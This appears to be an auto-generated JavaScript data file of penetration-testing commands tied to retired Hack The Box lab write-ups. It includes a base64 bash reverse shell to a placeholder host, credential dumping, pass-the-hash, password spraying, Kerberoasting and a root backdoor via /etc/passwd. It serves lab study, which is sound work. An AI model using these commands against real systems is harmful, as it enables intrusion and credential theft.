// Auto-generated by get_commands.py — do not edit manually
// Run: python3 get_commands.py <labname>

const COMMANDS_DATA = [

  // ── NMAP ─────────────────────────────────────────────────────────────────
  {
    "command": "nmap -p- <target> --min-rate 10000",
    "tool": "nmap",
    "lab": "general",
    "lab_url": "",
    "desc": "Full port scan with high min-rate for speed. Always start here to avoid missing non-standard ports.",
    "tags": "nmap portscan full reconnaissance"
  },
  {
    "command": "nmap -p <ports> <target> -sCV -oN nmapscan",
    "tool": "nmap",
    "lab": "general",
    "lab_url": "",
    "desc": "Service version and default script scan on discovered ports. -oN saves output to file for reference.",
    "tags": "nmap service version scripts enum"
  },
  {
    "command": "nmap -p- <target> --min-rate 10000 && nmap -p <ports> <target> -sCV -oN nmapscan",
    "tool": "nmap",
    "lab": "general",
    "lab_url": "",
    "desc": "Standard two-stage nmap workflow — full port discovery then targeted service scan.",
    "tags": "nmap workflow discovery service"
  },
  {
    "command": "nmap -sU -p 161 <target> --script snmp-info",
    "tool": "nmap",
    "lab": "general",
    "lab_url": "",
    "desc": "SNMP enumeration scan. UDP port 161 — often overlooked but can expose system info and credentials.",
    "tags": "nmap snmp udp enumeration"
  },

  // ── GOBUSTER / FFUF ──────────────────────────────────────────────────────
  {
    "command": "gobuster dir -u http://<target>/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt",
    "tool": "gobuster",
    "lab": "bashed",
    "lab_url": "/writeups/retired/bashed/",
    "desc": "Directory brute force with common extensions. Good first web enumeration step.",
    "tags": "gobuster directory brute force web enum"
  },
  {
    "command": "gobuster dir -u http://<target>:5000 -w /usr/share/wordlists/dirb/common.txt",
    "tool": "gobuster",
    "lab": "headless",
    "lab_url": "/writeups/retired/headless/",
    "desc": "Directory scan against non-standard port. Remember to specify port when target isn't on 80/443.",
    "tags": "gobuster directory port web enum"
  },
  {
    "command": "ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://<target>/ -H 'Host: FUZZ.<domain>' -fs <size>",
    "tool": "ffuf",
    "lab": "trick",
    "lab_url": "/writeups/retired/trick/",
    "desc": "Subdomain enumeration via Host header fuzzing. Use -fs to filter out the default response size.",
    "tags": "ffuf subdomain vhost fuzz dns"
  },
  {
    "command": "ffuf -w <wordlist> -u http://<target>/index.php?page=FUZZ -fs <size>",
    "tool": "ffuf",
    "lab": "trick",
    "lab_url": "/writeups/retired/trick/",
    "desc": "Parameter fuzzing for LFI/path traversal. Replace FUZZ with traversal payloads wordlist.",
    "tags": "ffuf lfi traversal parameter fuzz"
  },

  // ── CURL ─────────────────────────────────────────────────────────────────
  {
    "command": "curl -I http://<target>/",
    "tool": "curl",
    "lab": "lock",
    "lab_url": "/writeups/retired/lock/",
    "desc": "Fetch HTTP headers only. Reveals server version, tech stack, and interesting headers without downloading the body.",
    "tags": "curl headers http recon"
  },
  {
    "command": "curl http://<target>/robots.txt",
    "tool": "curl",
    "lab": "dog",
    "lab_url": "/writeups/retired/dog/",
    "desc": "Check robots.txt for disallowed paths that may reveal hidden directories or admin panels.",
    "tags": "curl robots recon web"
  },
  {
    "command": "curl -s http://localhost:<port>/<path>",
    "tool": "curl",
    "lab": "alert",
    "lab_url": "/writeups/retired/alert/",
    "desc": "Query a locally forwarded service. Use after SSH tunneling to reach internal services.",
    "tags": "curl localhost tunnel internal service"
  },

  // ── SMB ──────────────────────────────────────────────────────────────────
  {
    "command": "smbclient -N -L //<target>",
    "tool": "smbclient",
    "lab": "bastion",
    "lab_url": "/writeups/retired/bastion/",
    "desc": "List SMB shares anonymously. -N skips password prompt. Shows all available shares on the target.",
    "tags": "smbclient smb shares anonymous enum"
  },
  {
    "command": "smbclient -N //<target>/<share>",
    "tool": "smbclient",
    "lab": "bastion",
    "lab_url": "/writeups/retired/bastion/",
    "desc": "Connect to a specific SMB share anonymously. Use get/mget to download files once inside.",
    "tags": "smbclient smb share connect anonymous"
  },
  {
    "command": "nxc smb <target> -u <user> -p <password>",
    "tool": "netexec",
    "lab": "administrator",
    "lab_url": "/writeups/retired/administrator/",
    "desc": "Validate SMB credentials with NetExec. Returns (Pwn3d!) if user has admin access.",
    "tags": "netexec nxc smb credentials validate"
  },
  {
    "command": "nxc smb <target> -u <user> -p <password> --rid-brute | grep SidTypeUser",
    "tool": "netexec",
    "lab": "administrator",
    "lab_url": "/writeups/retired/administrator/",
    "desc": "RID brute force to enumerate domain users via SMB. Pipe through grep to filter just user accounts.",
    "tags": "netexec nxc smb rid brute users enum"
  },
  {
    "command": "nxc winrm <target> -u <user> -p <password>",
    "tool": "netexec",
    "lab": "general",
    "lab_url": "",
    "desc": "Test WinRM credentials. Returns (Pwn3d!) if user is in Remote Management Users group.",
    "tags": "netexec nxc winrm credentials"
  },
  {
    "command": "nxc smb <target> -u <user> -p <password> --shares",
    "tool": "netexec",
    "lab": "general",
    "lab_url": "",
    "desc": "List SMB shares with authenticated access. Shows read/write permissions per share.",
    "tags": "netexec nxc smb shares permissions"
  },

  // ── EVIL-WINRM ───────────────────────────────────────────────────────────
  {
    "command": "evil-winrm -i <target> -u <user> -p <password>",
    "tool": "evil-winrm",
    "lab": "administrator",
    "lab_url": "/writeups/retired/administrator/",
    "desc": "Connect to WinRM with username and password. Standard shell access for Windows targets.",
    "tags": "evil-winrm winrm shell windows remote"
  },
  {
    "command": "evil-winrm -i <target> -u <user> -H <ntlm_hash>",
    "tool": "evil-winrm",
    "lab": "administrator",
    "lab_url": "/writeups/retired/administrator/",
    "desc": "Pass-the-hash WinRM access. Use NTLM hash directly without knowing the plaintext password.",
    "tags": "evil-winrm pth pass-the-hash ntlm winrm"
  },
  {
    "command": "evil-winrm -i <target> -u <user> -p <password> -e <path_to_scripts>",
    "tool": "evil-winrm",
    "lab": "general",
    "lab_url": "",
    "desc": "Connect with a local scripts directory. Makes PowerShell scripts available for upload during the session.",
    "tags": "evil-winrm winrm scripts upload powershell"
  },

  // ── IMPACKET ─────────────────────────────────────────────────────────────
  {
    "command": "impacket-secretsdump <domain>/<user>:<password>@<target>",
    "tool": "impacket",
    "lab": "administrator",
    "lab_url": "/writeups/retired/administrator/",
    "desc": "Dump all credential material from a Windows target — SAM, SYSTEM, NTDS hashes, LSA secrets.",
    "tags": "impacket secretsdump dump hashes credentials ntds sam"
  },
  {
    "command": "impacket-secretsdump -k -no-pass <domain>/<user>@<target>",
    "tool": "impacket",
    "lab": "retro",
    "lab_url": "/writeups/retired/retro/",
    "desc": "Dump credentials using Kerberos ticket authentication instead of password. Use after certipy auth.",
    "tags": "impacket secretsdump kerberos ticket dump"
  },
  {
    "command": "impacket-GetNPUsers <domain>/ -dc-ip <dc_ip> -usersfile users.txt -no-pass -outputfile hashes.txt",
    "tool": "impacket",
    "lab": "sauna",
    "lab_url": "/writeups/retired/sauna/",
    "desc": "AS-REP roasting — request TGTs for users with pre-auth disabled. Outputs crackable hashes.",
    "tags": "impacket asreproast kerberos preauthentication tgt hash"
  },
  {
    "command": "impacket-GetUserSPNs <domain>/<user>:<password> -dc-ip <dc_ip> -request",
    "tool": "impacket",
    "lab": "support",
    "lab_url": "/writeups/retired/support/",
    "desc": "Kerberoasting — request TGS tickets for SPN accounts. Returns crackable service ticket hashes.",
    "tags": "impacket kerberoast spn tgs kerberos hash"
  },
  {
    "command": "impacket-psexec <domain>/<user>:<password>@<target>",
    "tool": "impacket",
    "lab": "general",
    "lab_url": "",
    "desc": "Remote code execution via SMB using psexec technique. Returns SYSTEM shell if admin credentials.",
    "tags": "impacket psexec rce smb system shell"
  },
  {
    "command": "impacket-wmiexec <domain>/<user>@<target> -hashes :<ntlm_hash>",
    "tool": "impacket",
    "lab": "retro",
    "lab_url": "/writeups/retired/retro/",
    "desc": "WMI-based remote execution using NTLM hash. Quieter than psexec — no service creation.",
    "tags": "impacket wmiexec wmi rce pth hash lateral"
  },
  {
    "command": "impacket-smbclient <domain>/<user>:<password>@<target>",
    "tool": "impacket",
    "lab": "general",
    "lab_url": "",
    "desc": "Authenticated SMB client for file operations. Supports get/put/ls on accessible shares.",
    "tags": "impacket smbclient smb files authenticated"
  },

  // ── KERBRUTE ─────────────────────────────────────────────────────────────
  {
    "command": "kerbrute userenum --dc <dc_ip> -d <domain> users.txt",
    "tool": "kerbrute",
    "lab": "retro",
    "lab_url": "/writeups/retired/retro/",
    "desc": "Enumerate valid domain usernames via Kerberos pre-authentication. Faster and quieter than SMB enumeration.",
    "tags": "kerbrute kerberos users enum domain valid"
  },
  {
    "command": "kerbrute passwordspray --dc <dc_ip> -d <domain> users.txt <password>",
    "tool": "kerbrute",
    "lab": "general",
    "lab_url": "",
    "desc": "Spray a single password across all users. Slow down rate to avoid lockouts — check lockout policy first.",
    "tags": "kerbrute password spray kerberos domain"
  },
  {
    "command": "kerbrute bruteuser --dc <dc_ip> -d <domain> <user> rockyou.txt",
    "tool": "kerbrute",
    "lab": "general",
    "lab_url": "",
    "desc": "Brute force a single user account via Kerberos. Less noisy than LDAP but still generates events.",
    "tags": "kerbrute bruteforce kerberos user password"
  },

  // ── BLOODHOUND ───────────────────────────────────────────────────────────
  {
    "command": "bloodhound-python -u <user> -p <password> -d <domain> -ns <dc_ip> -c all",
    "tool": "bloodhound",
    "lab": "administrator",
    "lab_url": "/writeups/retired/administrator/",
    "desc": "Collect all BloodHound data remotely using Python ingestor. Outputs JSON files for import into BloodHound GUI.",
    "tags": "bloodhound collect ingest domain ad recon"
  },
  {
    "command": "bloodhound-python -u <user> -p <password> -d <domain> -ns <dc_ip> -c DCOnly",
    "tool": "bloodhound",
    "lab": "general",
    "lab_url": "",
    "desc": "Collect only DC-based data — faster and quieter than full collection. Good for initial AD recon.",
    "tags": "bloodhound collect dc domain recon quiet"
  },

  // ── JOHN / HASHCAT ───────────────────────────────────────────────────────
  {
    "command": "john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt",
    "tool": "john",
    "lab": "administrator",
    "lab_url": "/writeups/retired/administrator/",
    "desc": "Crack hashes using John the Ripper with rockyou wordlist. Works with most common hash formats auto-detected.",
    "tags": "john crack hash wordlist rockyou password"
  },
  {
    "command": "john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --rules",
    "tool": "john",
    "lab": "general",
    "lab_url": "",
    "desc": "Crack hashes with rule-based mutations. Adds common transformations like capitalisation, numbers, and symbols.",
    "tags": "john crack hash rules mutations wordlist"
  },
  {
    "command": "hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt",
    "tool": "hashcat",
    "lab": "code",
    "lab_url": "/writeups/retired/code/",
    "desc": "Crack MD5 hashes with hashcat. Change -m value for other hash types (1000=NTLM, 1800=sha512crypt, 13100=Kerberoast).",
    "tags": "hashcat crack md5 hash wordlist rockyou"
  },
  {
    "command": "hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt",
    "tool": "hashcat",
    "lab": "general",
    "lab_url": "",
    "desc": "Crack NTLM hashes. NTLM is the Windows authentication hash format — most common from secretsdump output.",
    "tags": "hashcat crack ntlm hash windows password"
  },
  {
    "command": "hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt",
    "tool": "hashcat",
    "lab": "general",
    "lab_url": "",
    "desc": "Crack Kerberoast TGS hashes (RC4). Use after GetUserSPNs to recover service account passwords.",
    "tags": "hashcat crack kerberoast tgs rc4 kerberos"
  },
  {
    "command": "hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt",
    "tool": "hashcat",
    "lab": "general",
    "lab_url": "",
    "desc": "Crack AS-REP roast hashes. Use after GetNPUsers against accounts with pre-auth disabled.",
    "tags": "hashcat crack asreproast kerberos preauthentication"
  },
  {
    "command": "pwsafe2john <file>.psafe3 > hash && john hash --wordlist=/usr/share/wordlists/rockyou.txt",
    "tool": "john",
    "lab": "administrator",
    "lab_url": "/writeups/retired/administrator/",
    "desc": "Extract and crack a Password Safe database. pwsafe2john converts the file to a crackable format.",
    "tags": "john pwsafe password manager crack hash"
  },

  // ── BLOODYAD ─────────────────────────────────────────────────────────────
  {
    "command": "bloodyAD -u <user> -p <password> -d <domain> --dc-ip <dc_ip> set password <target_user> <newpassword>",
    "tool": "bloodyad",
    "lab": "administrator",
    "lab_url": "/writeups/retired/administrator/",
    "desc": "Force reset a domain user's password using bloodyAD. Requires GenericAll or ForceChangePassword rights on the target.",
    "tags": "bloodyad ad password reset genericall dacl abuse"
  },
  {
    "command": "bloodyAD -u <user> -p <password> -d <domain> --dc-ip <dc_ip> add groupMember <group> <user>",
    "tool": "bloodyad",
    "lab": "general",
    "lab_url": "",
    "desc": "Add a user to a domain group. Useful for adding to Remote Management Users or Domain Admins when GenericWrite is held.",
    "tags": "bloodyad ad group member add dacl abuse privilege"
  },
  {
    "command": "bloodyAD -u <user> -p <password> -d <domain> --dc-ip <dc_ip> get object <target> --attr msDS-AllowedToActOnBehalfOfOtherIdentity",
    "tool": "bloodyad",
    "lab": "general",
    "lab_url": "",
    "desc": "Check RBCD delegation settings on an object. Part of Resource-Based Constrained Delegation attack chain.",
    "tags": "bloodyad rbcd delegation kerberos ad"
  },

  // ── CERTIPY / ADCS ───────────────────────────────────────────────────────
  {
    "command": "certipy find -u <user>@<domain> -p <password> -vulnerable -stdout",
    "tool": "certipy",
    "lab": "retro",
    "lab_url": "/writeups/retired/retro/",
    "desc": "Enumerate AD CS for vulnerable certificate templates. Look for ESC1-ESC8 misconfigurations.",
    "tags": "certipy adcs certificate templates esc vulnerable"
  },
  {
    "command": "certipy req -u <user>@<domain> -p <password> -ca <ca_name> -template <template> -upn administrator@<domain>",
    "tool": "certipy",
    "lab": "retro",
    "lab_url": "/writeups/retired/retro/",
    "desc": "Request a certificate with a spoofed UPN for ESC1 exploitation. Impersonate any domain user including administrator.",
    "tags": "certipy adcs esc1 certificate request upn impersonate"
  },
  {
    "command": "certipy auth -pfx <file>.pfx -domain <domain>",
    "tool": "certipy",
    "lab": "retro",
    "lab_url": "/writeups/retired/retro/",
    "desc": "Authenticate using a PFX certificate to obtain a TGT and NTLM hash. Final step in ADCS ESC1 chain.",
    "tags": "certipy adcs auth pfx tgt ntlm hash"
  },

  // ── DNS ──────────────────────────────────────────────────────────────────
  {
    "command": "dig AXFR <domain> @<dns_server>",
    "tool": "dig",
    "lab": "trick",
    "lab_url": "/writeups/retired/trick/",
    "desc": "Attempt a DNS zone transfer. Returns all DNS records if misconfigured — reveals internal hostnames and IPs.",
    "tags": "dig dns zone transfer axfr enum"
  },
  {
    "command": "dig any <domain> @<dns_server>",
    "tool": "dig",
    "lab": "general",
    "lab_url": "",
    "desc": "Query all DNS record types for a domain. Faster recon before attempting a full zone transfer.",
    "tags": "dig dns records enum recon"
  },

  // ── SSH ──────────────────────────────────────────────────────────────────
  {
    "command": "ssh -i <key> <user>@<target>",
    "tool": "ssh",
    "lab": "general",
    "lab_url": "",
    "desc": "SSH login with a private key. chmod 600 the key first or SSH will refuse to use it.",
    "tags": "ssh key login private"
  },
  {
    "command": "ssh -L <localport>:127.0.0.1:<remoteport> <user>@<target>",
    "tool": "ssh",
    "lab": "chemistry",
    "lab_url": "/writeups/retired/chemistry/",
    "desc": "SSH local port forward — tunnel a remote internal service to your local machine.",
    "tags": "ssh tunnel port forward local pivot"
  },
  {
    "command": "ssh -oHostKeyAlgorithms=+ssh-rsa -oKexAlgorithms=+diffie-hellman-group1-sha1 <user>@<target>",
    "tool": "ssh",
    "lab": "beep",
    "lab_url": "/writeups/retired/beep/",
    "desc": "Connect to older SSH servers with deprecated algorithms. Required for legacy targets like older HTB machines.",
    "tags": "ssh legacy algorithms rsa diffie-hellman old"
  },

  // ── PRIVESC ──────────────────────────────────────────────────────────────
  {
    "command": "sudo -l",
    "tool": "shell",
    "lab": "general",
    "lab_url": "",
    "desc": "List sudo privileges for current user. First thing to run after getting a shell — reveals NOPASSWD entries.",
    "tags": "sudo privesc linux privilege escalation"
  },
  {
    "command": "getcap -r / 2>/dev/null",
    "tool": "shell",
    "lab": "waldo",
    "lab_url": "/writeups/retired/waldo/",
    "desc": "Find files with Linux capabilities set. cap_dac_read_search allows reading any file — useful for privesc.",
    "tags": "getcap capabilities linux privesc"
  },
  {
    "command": "find / -perm -4000 2>/dev/null",
    "tool": "shell",
    "lab": "general",
    "lab_url": "",
    "desc": "Find SUID binaries. Any binary running as root with SUID set is a potential privilege escalation vector.",
    "tags": "suid find privesc linux setuid"
  },
  {
    "command": "echo 'bash -c \"bash -i >& /dev/tcp/<ip>/<port> 0>&1\"' | base64",
    "tool": "shell",
    "lab": "reset",
    "lab_url": "/writeups/retired/reset/",
    "desc": "Generate a base64-encoded bash reverse shell. Decode and execute on target to avoid quote escaping issues.",
    "tags": "reverse shell bash base64 encoded payload"
  },
  {
    "command": "nc -nlvp <port>",
    "tool": "shell",
    "lab": "general",
    "lab_url": "",
    "desc": "Start a netcat listener for incoming reverse shells. -n no DNS, -l listen, -v verbose, -p port.",
    "tags": "netcat nc listener reverse shell"
  },
  {
    "command": "python3 -c 'import pty; pty.spawn(\"/bin/bash\")' && export TERM=xterm-256color",
    "tool": "shell",
    "lab": "headless",
    "lab_url": "/writeups/retired/headless/",
    "desc": "Upgrade a dumb shell to a fully interactive PTY. Run this immediately after catching a reverse shell.",
    "tags": "pty shell upgrade interactive bash python"
  },

  // ── SQLMAP ───────────────────────────────────────────────────────────────
  {
    "command": "sqlmap -u 'http://<target>/page.php?id=1' --dbs",
    "tool": "sqlmap",
    "lab": "general",
    "lab_url": "",
    "desc": "Enumerate databases on a potentially injectable URL parameter. Start here to confirm injection and list DBs.",
    "tags": "sqlmap sql injection enum databases"
  },
  {
    "command": "sqlmap -u 'http://<target>/page.php' --data='param=value' --cookie='session=abc' --dump -T <table> -D <database>",
    "tool": "sqlmap",
    "lab": "cat",
    "lab_url": "/writeups/retired/cat/",
    "desc": "Dump a specific table from a database via POST parameter with session cookie. Replace data, cookie, table, and DB.",
    "tags": "sqlmap sql injection dump table post cookie"
  },

  // ── LDAP / AD ENUM ───────────────────────────────────────────────────────
  {
    "command": "ldapdomaindump -u '<domain>\\<user>' -p <password> <dc_ip>",
    "tool": "ldapdomaindump",
    "lab": "retro",
    "lab_url": "/writeups/retired/retro/",
    "desc": "Dump all domain info via LDAP into readable HTML/JSON. Users, groups, GPOs, trusts — useful AD overview.",
    "tags": "ldap dump domain users groups ad enum"
  },
  {
    "command": "windapsearch -d <domain> -u <user> -p <password> --da",
    "tool": "windapsearch",
    "lab": "support",
    "lab_url": "/writeups/retired/support/",
    "desc": "Enumerate domain admins via LDAP using windapsearch. Quick way to identify high-value targets.",
    "tags": "windapsearch ldap domain admins enum ad"
  },

  // ── MISC ─────────────────────────────────────────────────────────────────
  {
    "command": "samdump2 SYSTEM SAM > hashes.txt",
    "tool": "shell",
    "lab": "bastion",
    "lab_url": "/writeups/retired/bastion/",
    "desc": "Extract local account hashes from offline SAM and SYSTEM registry hives. Common when accessing backup/VHD files.",
    "tags": "samdump2 sam system hashes offline registry"
  },
  {
    "command": "echo '<domain_ip> <hostname>' | sudo tee -a /etc/hosts",
    "tool": "shell",
    "lab": "retro",
    "lab_url": "/writeups/retired/retro/",
    "desc": "Add a hostname to /etc/hosts for DNS resolution. Required for most HTB machines before any other enumeration.",
    "tags": "hosts dns resolution hostname setup"
  },
  {
    "command": "xfreerdp3 /u:<user> /p:<password> /v:<target> /size:1920x1080 /dynamic-resolution",
    "tool": "xfreerdp",
    "lab": "lock",
    "lab_url": "/writeups/retired/lock/",
    "desc": "RDP connection to a Windows target. /dynamic-resolution allows window resizing.",
    "tags": "rdp xfreerdp windows remote desktop"
  },
  {
    "command": "scp <user>@<target>:<remote_path> <local_path>",
    "tool": "ssh",
    "lab": "bastion",
    "lab_url": "/writeups/retired/bastion/",
    "desc": "Securely copy files from a remote host. Useful for pulling config files, databases, or credential stores.",
    "tags": "scp copy file remote ssh exfil"
  },
  {
    "command": "python3 -m http.server 80",
    "tool": "python",
    "lab": "general",
    "lab_url": "",
    "desc": "Spin up a quick HTTP server in the current directory. Use to serve payloads, tools, or files to the target.",
    "tags": "python http server serve files payload delivery"
  },
  {
    "command": "openssl passwd -1 <password>",
    "tool": "shell",
    "lab": "writeup",
    "lab_url": "/writeups/retired/writeup/",
    "desc": "Generate an MD5crypt password hash for /etc/passwd injection. Pair with echo to add a root backdoor user.",
    "tags": "openssl passwd hash crypt passwd injection"
  }
];

const COMMANDS_META = {
  "total": 57,
  "labs": 20,
  "tools": [
    "bloodyad",
    "bloodhound",
    "certipy",
    "curl",
    "dig",
    "evil-winrm",
    "ffuf",
    "gobuster",
    "hashcat",
    "impacket",
    "john",
    "kerbrute",
    "ldapdomaindump",
    "netexec",
    "nmap",
    "python",
    "shell",
    "smbclient",
    "sqlmap",
    "ssh",
    "windapsearch",
    "xfreerdp"
  ]
};
